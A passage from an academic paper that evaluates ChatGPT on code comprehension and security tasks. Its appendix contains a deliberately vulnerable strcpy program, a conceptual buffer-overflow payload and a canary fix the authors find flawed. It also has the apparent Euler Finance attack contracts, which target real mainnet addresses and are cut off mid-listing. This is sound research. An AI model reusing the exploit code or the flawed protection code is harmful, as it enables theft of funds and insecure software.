To verify our findings, we conducted case studies on ChatGPT to further investigate the details. ChatGPT is a state-of-the-art LLM designed to understand and generate human-like text based on the input it receives. Its ability to answer questions, provide explanations, and engage in conversations is helpful for us to understand the nuances of success or failure in our case study. Similar to CodeBERT, ChatGPT has also been adopted to perform source code level analysis and address security-related issues, such as vulnerability discovery and fixing~\cite{surameery2023use,cheshkov2023evaluation}.

In this section, we conduct case studies on ChatGPT with a series of analytical tasks. Specifically, we first assess ChatGPT's capability to comprehend source code. Subsequently, we evaluate ChatGPT's proficiency in tackling specific security challenges and its generalization ability.

\subsection{Semantic Comprehension}

\label{sec:gene}
To evaluate whether ChatGPT has a better ability to understand the logical flows in the code without the influence of naming, we randomly select several code snippets from LeetCode~\footnote{The source code is available at: \url{https://github.com/Moirai7/ChatGPTforSourceCode}}, representing varying levels of difficulty, and assess ChatGPT's performance on the original code snippets and the corresponding obfuscated code snippets.

Our experiments show that ChatGPT can correctly understand the original code snippets.
Taking the Supper Egg Drop problem ({\bf \ref{appendix:Q1}}) as an example, it explains the purpose of the code snippet, the logic and complexity of the algorithm, and provides suggestions to improve the code. 
Then, we manually obfuscated the code snippets by renaming the variables and function names and insert dummy code that will not have an impact on its results.
The obfuscated code is shown in~\autoref{code:obfuscated}.
ChatGPT can not provide useful review of the obfuscated code ({\bf \ref{appendix:Q2}}).

Based on the responses from ChatGPT, we can conjecture that ChatGPT learns the literal features of code snippets that exist within its training data and generates responses based on statistical patterns involving characters, keywords, and syntactic structures. This knowledge encompasses various aspects such as indentation, syntax, and common coding conventions. However, it lacks a profound comprehension of code semantics, logic, or context beyond the patterns and examples present in its training data. Consequently, it struggles to comprehend obfuscated code, as it relies heavily on literal features. This issue is exacerbated by the fact that ChatGPT is trained on a general corpus rather than a code-focused corpus like CodeBERT, making it more susceptible to misinterpretation due to name changes.

\subsection{Vulnerabilities Analysis}
\label{sec:smart}
Though GPT relies on literal features to understand code logic, several works demonstrate its ability to understand normal code (without obfuscation)~\cite{sun2024gptscan,sagodi2024reality,xiao2023supporting}.
The following section tests its ability in software testing, including vulnerability identification, exploitation development, remediation, and real-world security audits.

\subsubsection{Synthetic Programs and Classic Vulnerability}
We adopt a piece of code ({\bf \ref{appendix:Q3}}) that contains buffer overflow vulnerability and then task ChatGPT to find the vulnerabilities.
Then, we replace the \texttt{strcpy} function with a homemade string copy function ({\bf \ref{appendix:Q4}}) and challenge ChatGPT with modified code.
The analysis conducted by ChatGPT on the vulnerability in the code was impressively accurate, showing its potential to identify vulnerabilities in the source code effectively.
However, in an effort to explore its understanding of potential security risks, we posed another question:
\ding{182} Whether ChatGPT can exploit a vulnerability to launch an attack.

Through experiment ({\bf \ref{appendix:Q5}}), we observed that the exploit proposed by ChatGPT, although not directly usable to launch attacks, was conceptually correct.
This suggests that ChatGPT possesses the ability to assist attackers in generating potential exploits.

Then, we investigate \ding{183} whether ChatGPT can also provide solutions to fix the identified vulnerability.
Our evaluation ({\bf \ref{appendix:Q6}}) has demonstrated that the proposed patching effectively addresses the vulnerability in the code, providing an effective fix. As a result, we believe that ChatGPT holds the potential to assist developers and security analysts in identifying and resolving vulnerabilities in normal programs.

Finally, we assess \ding{184} whether it can suggest protection schemes that thwart potential exploits by attackers.
By leveraging ChatGPT's analysis, we aim to explore its ability to propose robust security measures that can safeguard against known vulnerabilities and potential attack vectors.

In the experiment (({\bf \ref{appendix:Q7}})), the proposed protection scheme suggested by ChatGPT demonstrates a conceptually correct approach to detect buffer overflows through the use of a ``canary''.
However, upon closer inspection, we identified some implementation errors that may impact its effectiveness.
The placement of the canary at the beginning of the buffer, instead of at the end, renders it unable to detect buffer overflows that overwrite adjacent variables located at higher memory addresses.
Additionally, the revised code introduces the ``canary'' into the buffer without correspondingly increasing the buffer size, limiting its capacity to handle strings as long as the original implementation.

While ChatGPT appears to understand the concept of using a ``canary'' for buffer overflow detection, it seems to struggle in correctly applying this knowledge to unseen code snippets. These issues raise concerns regarding ChatGPT's soundness.
That means GPT can provide answer/solution that are correct in the high level, but incorrect in some details. 
As the software protection require higher soundness, which poses challenges to adopt GPT to protect software. 

\subsubsection{Real-world Program and Logic Bugs}
The last subsection discussed GPT's ability with synthetic programs containing popular classic bugs. In this section, we test its ability to reason about logic bugs (cross-function vulnerabilities) in real-world applications. Specifically, our objective is to investigate the capabilities of ChatGPT to analyze and audit smart contracts, which are commonly deployed in the Web3 ecosystem.

First, we tested different types of vulnerabilities (({\bf \ref{appendix:Q8}})) that happened before ChatGPT launched so that they could potentially manifest within the ChatGPT system (\ie, seen programs).
According to the answer, ChatGPT adeptly identifies potential vulnerabilities and offers appropriate patches. Furthermore, after selecting a full list of smart contracts \cite{Crytic,runtimeverified} across various categories including reentrancy attack and variable shadowing, ChatGPT consistently discerns vulnerabilities and provides accurate solutions.

Secondly, we conducted analyses on a selection of recently emerged vulnerable smart contracts (({\bf \ref{appendix:Q9}})), occurring within the temporal scope of 2023, to evaluate their efficacy in terms of generalization. This examination was predicated upon a real-world incursion targeting Midas Capital (as detailed in \cite{midascapital}) in June 2023.
The actual root cause of this attack is due to round issues, however, based on the answer that ChatGPT gives us, it is not aware of the risk in function \texttt{redeemFresh}.
We also test several recent attack cases \cite{Web3Sec}, and ChatGPT can correctly identify none of them.

Third, we additionally assess the efficacy of ChatGPT in the realm of cross-contract vulnerability detection (({\bf \ref{appendix:Q10}})). 
To this end, we present a real-world attack scenario exemplified by an incident occurring within the Euler Finance ecosystem \cite{eulerdefi}.
According to the findings of the analysis, ChatGPT is unable to accurately discern vulnerabilities, opting instead to provide seemingly correct responses arbitrarily, devoid of substantive remedial recommendations. Consequently, it is still difficult for chatGPT to grapple with the intricacies in the analysis of cross-contract vulnerabilities.

\subsection{Observations}
% This section presents a series of experiments and empirical analyses aimed at elucidating ChatGPT's capacity for solving security-oriented program analysis.
% Firstly, it demonstrates that ChatGPT, along with other large language models, opens up a novel avenue for security-oriented source code analysis, proving to be an efficient method for learning high-level semantics from well-named source code. 

The conclusion of this case study aligns with the findings from our main experiments: users should expect degraded model performance when applying LLMs to analyze source code lacking sufficient information in variable, function, or class names. For instance, code generated from decompilation~\cite{katz2018using} or code that does not adhere to standard naming conventions~\cite{butler2015investigating} may yield lower accuracy, as demonstrated in questions {\bf \ref{appendix:Q1}} and {\bf \ref{appendix:Q2}}.
Furthermore, additional findings from the case study indicate that for very specific questions involving implementation-level details, logical reasoning, or systematic solutions, ChatGPT's proposed solutions may be conceptually correct at a high level but may not fully address the problem.
\section{Conclusion}
This study unveils the strengths and limitations of LLMs when applied to security-oriented code analysis tasks. Our focused experiments on CodeBERT and GraphCodeBERT shed light on the impact of literal and logic features on their performance, indicating the importance of considering the reliability of features in analyzed code. Users and researchers should be aware that LLM performance may be hindered when analyzing complex source code with insufficient information on variables, methods, and function names. We believe that our findings and analysis will provide valuable insights for future researchers in this domain, facilitating a deeper understanding of LLMs' potential and limitations in software security.

% \balance
\bibliographystyle{ACM-Reference-Format}
\bibliography{main}

\label{sec:apdx}
\appendix
% \section{Prompts and Responses}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{{\bf \setword{Appx Q1}{appendix:Q1}:} Could you review the bellowing code?}
  {\begin{lstlisting}[language=C++,
    emph={abc,printf,main},
    % abovecaptionskip=0pt,
    % belowcaptionskip=0pt,
    belowskip=-1.2 \baselineskip,
    caption={A solution to \texttt{Supper Egg Drop} problem from LeetCode.},
    label=code:eggoriginal,captionpos=b]
    int superEggDrop(int K, int N) {
        vector<vector<int>> dp(N + 1, vector<int>(K + 1, 0));
        int m = 0;
        while (dp[m][K] < N) {
            m++;
            for (int k = 1; k <= K; ++k)
                dp[m][k] = dp[m - 1][k - 1] + dp[m - 1][k] + 1;
        }
        return m;
    }
  \end{lstlisting}
  }
  \end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
The code appears to be a dynamic programming solution to the  ``egg drop'' problem, where one has $K$ eggs and a building with $N$ floors, and the objective is to find the minimum number of drops required to determine the floor from which the egg breaks.

The code creates a 2D vector dp with dimensions $(N+1) \times (K+1)$ and initializes all elements to $0$. It then iterates through values of $m$ (starting from $1$) until the value of $dp[m][K]$ is greater than or equal to $N$. For each value of $m$, it updates the values of $dp[m][k]$ for each egg $(k)$, based on the recurrence relation $dp[m][k] = dp[m-1][k-1] + dp[m-1][k] + 1$. Finally, it returns the value of $m$.

Overall, the code looks correct and efficient. It correctly computes the minimum number of drops required to determine the floor from which the egg breaks. The use of dynamic programming allows the algorithm to avoid unnecessary computations and runs in $O(K \times N)$ time, which is optimal for this problem.

However, it should be noted that this solution is not the only one to the egg drop problem, and there are other approaches that can be taken to solve it. Also, the code could benefit from some comments to explain the purpose and logic of the algorithm.
  }\end{shaded*}

  \begin{lstlisting}[language=C++,
    emph={abc,printf,main},
    caption={\textbf{Obfuscated code based on Supper Egg Drop solution}. We renaming the variables and function names and insert dummy code that will not have a effect on its results.},label=code:obfuscated,captionpos=b]
// obfuscated code snippet
int gyjdfgadfsfvcvjhyt(int kdsfjaldfie55qwer, int kdsfja) {
    vector<vector<int>> kdasd35sfja(kdsfja + 1, vector<int>(kdsfjaldfie55qwer + 1, 0));
    int kdasd35sfjada = 0;
    int af567856dfg = kdasd35sfja.size(), abf567856dfg = kdasd35sfja[0].size(),
        abf5678s56dfg = 0, abf5678sss56dfg = abf567856dfg - 1;
        int abfss556dfg =0;

    while (kdasd35sfja[kdasd35sfjada][kdsfjaldfie55qwer] < kdsfja) {
        while (abf5678s56dfg < af567856dfg && abf5678sss56dfg > -1) {
            int abf556dfg = kdasd35sfja[abf5678s56dfg][abf5678sss56dfg];
            if (abf556dfg == abfss556dfg) break;
            if (abfss556dfg > abf556dfg) abf5678s56dfg++;
            else abf5678sss56dfg--;
        }
        kdasd35sfjada++;
        for (int sdf23423 = 1; sdf23423 <= kdsfjaldfie55qwer; ++sdf23423)
            kdasd35sfja[kdasd35sfjada][sdf23423] = kdasd35sfja[kdasd35sfjada - 1][sdf23423 - 1] + kdasd35sfja[kdasd35sfjada - 1][sdf23423] + 1;
    }
    return kdasd35sfjada;
}
\end{lstlisting}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q2}{appendix:Q2}:} \textit{Could you review~\ref{code:obfuscated}?}
  {}
  \end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
The code you have provided appears to be written in C++ and defines a function called ``gyjdfgadfsfvcvjhyt''. Unfortunately, the function name and parameters do not give any indication of what the function is supposed to do. It would be helpful to have some context or explanation of the intended purpose of this function.

Regarding the code itself, there are some issues with readability and style that could be improved. For example, the use of single-letter variable names (\eg, ``kdsfjaldfie55qwer'', ``kdasd35sfja'') can make it difficult for someone reading the code to understand what is going on. Additionally, the inconsistent use of whitespace and indentation can make the code more difficult to read.

It's also worth noting that the code appears to be using nested while loops, which can be difficult to follow and potentially lead to performance issues if the loops are executing a large number of times. Without more context, it's difficult to say whether this is a problem in this particular case.

Finally, there are no comments or documentation explaining what the code is doing, which could make it difficult for other developers to understand and modify the code in the future.

Overall, I would recommend improving the readability and style of the code, adding comments and documentation, and providing more context and explanation of the intended purpose of the function.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q3}{appendix:Q3}:} \textit{Does this piece of code have vulnerability?} 
  {
  \begin{lstlisting}[language=C++,
    emph={strcpy,printf,main},
    belowskip=-1.2 \baselineskip,
    caption={A piece of code that contains a buffer overflow vulnerability.},label=code:overflow,captionpos=b]
    int main(int argc, char *argv[])
    {
        char buffer[5];  
        strcpy(buffer, argv[1]);
        printf("buffer content= %s\n", buffer);
        return 0;
    }
\end{lstlisting}
  }
\end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} Yes, this piece of code has a vulnerability known as a buffer overflow.

    The variable buffer is defined as an array of 5 characters, which means it can hold up to 4 characters plus the null terminator. However, the program copies the content of argv[1] into buffer using the \texttt{strcpy} function, which does not check if the source string is larger than the destination buffer.
    
    If argv[1] contains more than 4 characters (or the null terminator), \texttt{strcpy} will write past the end of buffer, potentially overwriting other important data on the stack. This can cause unpredictable behavior, crashes, and even security vulnerabilities like code injection.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q4}{appendix:Q4}:} \textit{Does this piece of code have vulnerability?} 
  {\begin{lstlisting}[language=C++,
    emph={abc,printf,main},
    belowskip=-1.2 \baselineskip,
    caption={A piece of code that contains a buffer overflow vulnerability.},label=code:overflow2,captionpos=b]
    char* abc(char* def, const char* hij)
    {
        if (def == NULL) {
            return NULL;
        }
        char *ptr = def;
        while ( *hij != 0)
        {
            *def = *hij;
            def++;
            hij++;
        }
        *def = 0;
        return ptr;
    }
    int main(int argc, char *argv[])
    {
        char xyz[5];  
        abc(xyz, argv[1]);
        printf("xyz content= %s\n", xyz);
        return 0;
    }
\end{lstlisting}
  }
\end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
    Yes, the provided code contains a vulnerability related to the use of the abc function and the potential for buffer overflow. The vulnerable code is in the abc function.

    The issue arises from the fact that there is no check on the size of the destination buffer (\texttt{def}) before copying data from the source (\texttt{hij}). The function uses a simple loop to copy characters from hij to def until it reaches the null-terminator (`0'). However, it does not verify whether the destination buffer has enough space to hold the entire source string.

    In the main function, the \texttt{xyz} buffer is declared with a size of 5 characters. If the user provides a command-line argument (argv[1]) longer than 4 characters (since one byte is reserved for the null-terminator), the abc function will copy the characters beyond the bounds of the xyz buffer, leading to a buffer overflow. This behavior results in undefined behavior, potentially overwriting adjacent memory or causing segmentation faults.

    To fix this vulnerability, you should modify the abc function to take the size of the destination buffer as an additional argument and ensure that it does not exceed the buffer size during the copying process. Alternatively, you can use safer string functions like 
    \texttt{strncpy} or \texttt{memcpy} that allow specifying the size of the destination buffer to avoid buffer overflows.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q5}{appendix:Q5}:} \textit{How to leverage this vulnerability to launch attack? }
\end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
    This program has a buffer overflow vulnerability, which can be exploited by an attacker to gain control of the program execution and possibly execute malicious code. Here's an example of how an attacker could leverage this vulnerability to launch an attack: 
    
    The attacker crafts a malicious input string that is longer than 5 bytes, such as 
    \begin{lstlisting}[language=C++,
        emph={strcpy,strlen,main,printf},
        label=code:bit11,captionpos=b, numbers=none, frame=none]
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
    \end{lstlisting}
    The attacker runs the program with the malicious input as a command-line argument, like this: 
    \begin{lstlisting}[language=C++,
        emph={strcpy,strlen,main,printf},
        label=code:bit12,captionpos=b, numbers=none, frame=none]
"./program AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB" 
    \end{lstlisting}
    When the program executes the \texttt{strcpy} function with the malicious input, it copies the entire string (including the "BBBB" part) into the buffer, overwriting the return address on the stack. The attacker's code in the "BBBB" part of the input string gets executed instead of the intended code, giving the attacker control of the program execution and potentially allowing them to execute arbitrary code or launch further attacks.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q6}{appendix:Q6}:} \textit{Can you rewrite the code to avoid the vulnerability?}
  { }
  \end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
Yes, we can rewrite the code to avoid the buffer overflow vulnerability. Here's an example:
\begin{lstlisting}[language=C++,
    emph={strcpy,strlen,main,printf},
    caption={{\bf Source code of bubble sorting algirithm.} We not only anonymized the name of function and variable name but also split the algorithm into three functions.},label=code:bit13,captionpos=b]
    int main(int argc, char *argv[]) {
        char buffer[BUFFER_SIZE];
        int len;
        if (argc < 2) {
            printf("Usage: %s <string>\n", argv[0]);
            return 1;
        }
        len = strlen(argv[1]);
        if (len >= BUFFER_SIZE) {
            printf("Input string is too long\n");
            return 1;
        }
        strcpy(buffer, argv[1]);
        printf("buffer content = %s\n", buffer);
        return 0;
    }
\end{lstlisting}

In this version of the code, we have defined a constant BUFFER\_SIZE to set the maximum size of the buffer. Before copying the input string to the buffer, we check its length to ensure it will not overflow the buffer. If the input string is too long, we print an error message and exit the program. This way, we ensure that the buffer will never be overflowed.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q7}{appendix:Q7}:} \textit{Can you propose a method to detect the vulnerability at program running time?}
  {}
  \end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} 
One method to detect the vulnerability at program running time is to use a technique called ``canary values'' or ``stack cookie''. This technique involves adding a random value (the ``canary'') to the stack before the buffer, and checking that the canary has not been overwritten when the function returns.

To implement this technique, we can modify the original code as follows:
\begin{lstlisting}[language=C++,
    emph={memcpy,strlen,main,printf},
    label=code:canary,captionpos=b]
    int main(int argc, char *argv[]){
        char buffer[5];
        int canary = rand();
        printf("Canary value: %d\n", canary);
        memcpy(buffer, &canary, sizeof(canary));
        memcpy(buffer + sizeof(canary), argv[1], strlen(argv[1]) + 1);
        if (canary != *(int*)buffer) {
            printf("Buffer overflow detected!");
        } else {
            printf("buffer content = %s\n", buffer + sizeof(canary));
        }
        return 0;
    }
\end{lstlisting}
In this modified code, we add a random integer canary value to the stack before the buffer. We then check if the canary value has been modified after the user input is copied into the buffer. If the canary value has been modified, it indicates that a buffer overflow has occurred, and we can take appropriate action, such as terminating the program or alerting the user.

Note that this technique is not foolproof and can be bypassed in certain cases. It is still important to ensure that buffers are properly sized and user input is properly validated to avoid buffer overflow vulnerabilities in the first place.
  }\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q8}{appendix:Q8}:} \textit{Does this contract have any vulnerabitiy?} 
  {
  \begin{lstlisting}[language=Solidity,
    emph={},
    belowskip=-1.2 \baselineskip,
    caption={A piece of code that contains account permission vulnerability.},label=code:permission,captionpos=b]
    pragma solidity ^0.4.15;
    contract Unprotected{
        address private owner;
    
        modifier onlyowner {
            require(msg.sender==owner);
            _;
        }
    
        function Unprotected()
            public 
        {
            owner = msg.sender;
        }
    
        // This function should be protected
        function changeOwner(address _newOwner) 
            public
        {
           owner = _newOwner;
        }
    
        function changeOwner_fixed(address _newOwner) 
            public 
            onlyowner
        {
           owner = _newOwner;
        }
    }
\end{lstlisting}
  }
\end{shaded*}
\vspace{-1.7em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} Yes, the Unprotected contract has a vulnerability.
In the \texttt{changeOwner} function, anyone can call it and change the owner of the contract without any restriction. This means that an attacker could take over ownership of the contract, potentially causing harm to its functionality or funds.
To fix this vulnerability, you've already provided a solution with the \texttt{changeOwner\_fixed} function, which includes the \texttt{onlyowner} modifier. This modifier restricts the execution of the function to only the current owner of the contract, thus mitigating the vulnerability.
}\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q9}{appendix:Q9}:} \textit{Does this contract have any vulnerabitiy?} 
  {
  \begin{lstlisting}[language=Solidity,
    emph={},
    belowskip=-1.2 \baselineskip,
    caption={A piece of code that contains round issues.},label=code:redeem,captionpos=b]
    /**
     * @notice User redeems cTokens in exchange for the underlying asset
     * @dev Assumes interest has already been accrued up to the current block
     * @param redeemer The address of the account which is redeeming the tokens
     * @param redeemTokensIn The number of cTokens to redeem into underlying
     *    (only one of redeemTokensIn or redeemAmountIn may be non-zero)
     * @param redeemAmountIn The number of underlying tokens to receive from redeeming cTokens
     *    (only one of redeemTokensIn or redeemAmountIn may be non-zero)
     * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
     */
    function redeemFresh(address redeemer, uint256 redeemTokensIn, uint256 redeemAmountIn) internal returns (uint256) {
      require(redeemTokensIn == 0 || redeemAmountIn == 0, "!redeemTokensInorOut!=0");
    
      RedeemLocalVars memory vars;
    
      /* exchangeRate = invoke Exchange Rate Stored() */
      (vars.mathErr, vars.exchangeRateMantissa) = exchangeRateStoredInternal();
      if (vars.mathErr != MathError.NO_ERROR) {
        return failOpaque(Error.MATH_ERROR, FailureInfo.REDEEM_EXCHANGE_RATE_READ_FAILED, uint256(vars.mathErr));
      }
    
      if (redeemAmountIn == type(uint256).max) {
        redeemAmountIn = comptroller.getMaxRedeemOrBorrow(redeemer, address(this), false);
      }
    
      /* If redeemTokensIn > 0: */
      if (redeemTokensIn > 0) {
        /*
          * We calculate the exchange rate and the amount of underlying to be redeemed:
          *  redeemTokens = redeemTokensIn
          *  redeemAmount = redeemTokensIn x exchangeRateCurrent
          */
        vars.redeemTokens = redeemTokensIn;
    
        (vars.mathErr, vars.redeemAmount) = mulScalarTruncate(Exp({mantissa: vars.exchangeRateMantissa}), redeemTokensIn);
        if (vars.mathErr != MathError.NO_ERROR) {
          return
            failOpaque(Error.MATH_ERROR, FailureInfo.REDEEM_EXCHANGE_TOKENS_CALCULATION_FAILED, uint256(vars.mathErr));
        }
      } else {
        /*
          * We get the current exchange rate and calculate the amount to be redeemed:
          *  redeemTokens = redeemAmountIn / exchangeRate
          *  redeemAmount = redeemAmountIn
          */
    
        (vars.mathErr, vars.redeemTokens) =
          divScalarByExpTruncate(redeemAmountIn, Exp({mantissa: vars.exchangeRateMantissa}));
        if (vars.mathErr != MathError.NO_ERROR) {
          return
            failOpaque(Error.MATH_ERROR, FailureInfo.REDEEM_EXCHANGE_AMOUNT_CALCULATION_FAILED, uint256(vars.mathErr));
        }
    
        vars.redeemAmount = redeemAmountIn;
      }
    
      /* Fail if redeem not allowed */
      uint256 allowed = comptroller.redeemAllowed(address(this), redeemer, vars.redeemTokens);
      if (allowed != 0) {
        return failOpaque(Error.COMPTROLLER_REJECTION, FailureInfo.REDEEM_COMPTROLLER_REJECTION, allowed);
      }
    
      /* Verify market's block number equals current block number */
      if (accrualBlockNumber != getBlockNumber()) {
        return fail(Error.MARKET_NOT_FRESH, FailureInfo.REDEEM_FRESHNESS_CHECK);
      }
    
      /*
        * We calculate the new total supply and redeemer balance, checking for underflow:
        *  totalSupplyNew = totalSupply - redeemTokens
        *  accountTokensNew = accountTokens[redeemer] - redeemTokens
        */
      (vars.mathErr, vars.totalSupplyNew) = subUInt(totalSupply, vars.redeemTokens);
      if (vars.mathErr != MathError.NO_ERROR) {
        return failOpaque(Error.MATH_ERROR, FailureInfo.REDEEM_NEW_TOTAL_SUPPLY_CALCULATION_FAILED, uint256(vars.mathErr));
      }
    
      (vars.mathErr, vars.accountTokensNew) = subUInt(accountTokens[redeemer], vars.redeemTokens);
      if (vars.mathErr != MathError.NO_ERROR) {
        return
          failOpaque(Error.MATH_ERROR, FailureInfo.REDEEM_NEW_ACCOUNT_BALANCE_CALCULATION_FAILED, uint256(vars.mathErr));
      }
    
      /* Fail gracefully if protocol has insufficient cash */
      if (getCashPrior() < vars.redeemAmount) {
        return fail(Error.TOKEN_INSUFFICIENT_CASH, FailureInfo.REDEEM_TRANSFER_OUT_NOT_POSSIBLE);
      }
    
      /////////////////////////
      // EFFECTS & INTERACTIONS
      // (No safe failures beyond this point)
    
      /* We write previously calculated values into storage */
      totalSupply = vars.totalSupplyNew;
      accountTokens[redeemer] = vars.accountTokensNew;
    
      /*
        * We invoke doTransferOut for the redeemer and the redeemAmount.
        *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
        *  On success, the cToken has redeemAmount less of cash.
        *  doTransferOut reverts if anything goes wrong, since we can't be sure if side effects occurred.
        */
      doTransferOut(redeemer, vars.redeemAmount);
    
      /* We emit a Transfer event, and a Redeem event */
      emit Transfer(redeemer, address(this), vars.redeemTokens);
      emit Redeem(redeemer, vars.redeemAmount, vars.redeemTokens);
    
      /* We call the defense hook */
      comptroller.redeemVerify(address(this), redeemer, vars.redeemAmount, vars.redeemTokens);
    
      return uint256(Error.NO_ERROR);
    }
\end{lstlisting}
  }
\end{shaded*}
\vspace{-2.0em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} The redeemFresh function appears to be well-written with proper checks and comments. However, without seeing the complete context of the contract, including the definitions of the structures and functions it calls, it's challenging to determine if there are any vulnerabilities definitively. Here are some points to consider:
\begin{itemize}
    \item Integer Underflow/Overflow: The function checks for underflow/overflow in several places, which is good practice. However, ensuring that the conditions leading to these checks are appropriately handled throughout the contract is crucial.
    \item External Calls: The function interacts with external contracts, such as comptroller, doTransferOut, and potentially others. Ensure that these contracts are trusted and that their behaviors cannot be manipulated to exploit the current contract.
    \item Reentrancy: Although not evident in this snippet, any external calls or state changes before sensitive operations should be scrutinized for potential reentrancy vulnerabilities.
    \item Gas Limit: The function may perform several operations and interact with other contracts. Ensure that it stays within the gas limit to prevent out-of-gas errors.
    \item Error Handling: The function returns error codes upon failure, but ensure that these errors are appropriately handled by callers to prevent unexpected behavior.
Without more context and knowledge of the entire system, it's difficult to conclusively determine whether the contract has vulnerabilities. A thorough security audit, considering the entire codebase and its interactions, is recommended to identify and address any potential issues.
\end{itemize}

}\end{shaded*}

\colorlet{shadecolor}{red!5}
\begin{shaded*}
\noindent{\bf \setword{Appx Q10}{appendix:Q10}:} \textit{Does this contract have any vulnerabitiy?} 
  {
  \begin{lstlisting}[language=Solidity,
    emph={},
    belowskip=-1.2 \baselineskip,
    caption={Code Snippet from Eular Finance protocol.},label=code:eular,captionpos=b]
    // SPDX-License-Identifier: MIT
    pragma solidity 0.8.10;
    
    import "forge-std/Test.sol";
    
    interface IERC20 {
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(address indexed owner, address indexed spender, uint256 value);
    
        function totalSupply() external view returns (uint256);
        function balanceOf(address account) external view returns (uint256);
        function decimals() external view returns (uint8);
        function transfer(address to, uint256 amount) external returns (bool);
        function allowance(address owner, address spender) external view returns (uint256);
        function approve(address spender, uint256 amount) external returns (bool);
        function transferFrom(
            address from,
            address to,
            uint256 amount
        ) external returns (bool);
    }
    interface IAaveFlashloan {
        function flashLoan(
            address receiverAddress,
            address[] calldata assets,
            uint256[] calldata amounts,
            uint256[] calldata modes,
            address onBehalfOf,
            bytes calldata params,
            uint16 referralCode
        ) external;
    }
    interface EToken {
        function deposit(uint256 subAccountId, uint256 amount) external;
        function mint(uint256 subAccountId, uint256 amount) external;
        function donateToReserves(uint256 subAccountId, uint256 amount) external;
        function withdraw(uint256 subAccountId, uint256 amount) external;
    }
    
    interface DToken {
        function repay(uint256 subAccountId, uint256 amount) external;
    }
    
    interface IEuler {
        struct LiquidationOpportunity {
            uint256 repay;
            uint256 yield;
            uint256 healthScore;
            uint256 baseDiscount;
            uint256 discount;
            uint256 conversionRate;
        }
    
        function liquidate(
            address violator,
            address underlying,
            address collateral,
            uint256 repay,
            uint256 minYield
        ) external;
        function checkLiquidation(
            address liquidator,
            address violator,
            address underlying,
            address collateral
        ) external returns (LiquidationOpportunity memory liqOpp);
    }
    
    contract Iviolator {
        IERC20 DAI = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
        EToken eDAI = EToken(0xe025E3ca2bE02316033184551D4d3Aa22024D9DC);
        DToken dDAI = DToken(0x6085Bc95F506c326DCBCD7A6dd6c79FBc18d4686);
        IEuler Euler = IEuler(0xf43ce1d09050BAfd6980dD43Cde2aB9F18C85b34);
        address Euler_Protocol = 0x27182842E098f60e3D576794A5bFFb0777E025d3;
    
        function violator() external {
            DAI.approve(Euler_Protocol, type(uint256).max);
            eDAI.deposit(0, 20_000_000 * 1e18);
            eDAI.mint(0, 200_000_000 * 1e18);
            dDAI.repay(0, 10_000_000 * 1e18);
            eDAI.mint(0, 200_000_000 * 1e18);
            eDAI.donateToReserves(0, 100_000_000 * 1e18);
        }
    }
    
    contract Iliquidator {
        IERC20 DAI = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
        EToken eDAI = EToken(0xe025E3ca2bE02316033184551D4d3Aa22024D9DC);
        DToken dDAI = DToken(0x6085Bc95F506c326DCBCD7A6dd6c79FBc18d4686);
        IEuler Euler = IEuler(0xf43ce1d09050BAfd6980dD43Cde2aB9F18C85b34);
        address Euler_Protocol = 0x27182842E098f60e3D576794A5bFFb0777E025d3;
    
        function liquidate(address liquidator, address violator) external {
            IEuler.LiquidationOpportunity memory returnData =
                Euler.checkLiquidation(liquidator, violator, address(DAI), address(DAI));
            Euler.liquidate(violator, address(DAI), address(DAI), returnData.repay, returnData.yield);
            eDAI.withdraw(0, DAI.balanceOf(Euler_Protocol));
            DAI.transfer(msg.sender, DAI.balanceOf(address(this)));
        }
    }
    
    contract ContractTest is Test {
        IERC20 DAI = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
        EToken eDAI = EToken(0xe025E3ca2bE02316033184551D4d3Aa22024D9DC);
